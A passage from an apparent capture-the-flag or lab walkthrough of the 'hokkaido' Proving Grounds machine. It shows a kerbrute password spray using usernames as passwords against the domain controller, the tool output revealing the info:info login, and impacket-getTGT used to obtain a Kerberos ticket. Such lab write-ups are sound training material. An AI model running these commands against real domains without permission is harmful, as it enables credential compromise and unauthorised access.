Password Spray


3 valid domain user have been discovered through a brute-force attack against the target KDC service. While no password is known at this time, I will attempt to perform a password spraying attack with their username as password

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ kerbrute passwordspray --dc dc.hokkaido-aerospace.com -d HOKKAIDO-AEROSPACE.COM --user-as-pass ./users.txt 
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 04/25/25 - Ronnie Flathers @ropnop
 
2025/04/25 14:49:25 >  Using KDC(s):
2025/04/25 14:49:25 >  	dc.hokkaido-aerospace.com:88
 
2025/04/25 14:49:26 >  [+] VALID LOGIN:	 info@HOKKAIDO-AEROSPACE.COM:info
2025/04/25 14:49:26 >  Done! Tested 4 logins (1 successes) in 0.121 seconds

Performing a password spraying attack with the --user-as-pass flag to test username as password The info account has its password set to info

Validation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -dc-ip $IP    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: info
[*] Saving ticket in info@dc.hokkaido-aerospace.com.ccache

Validated TGT generated for the info account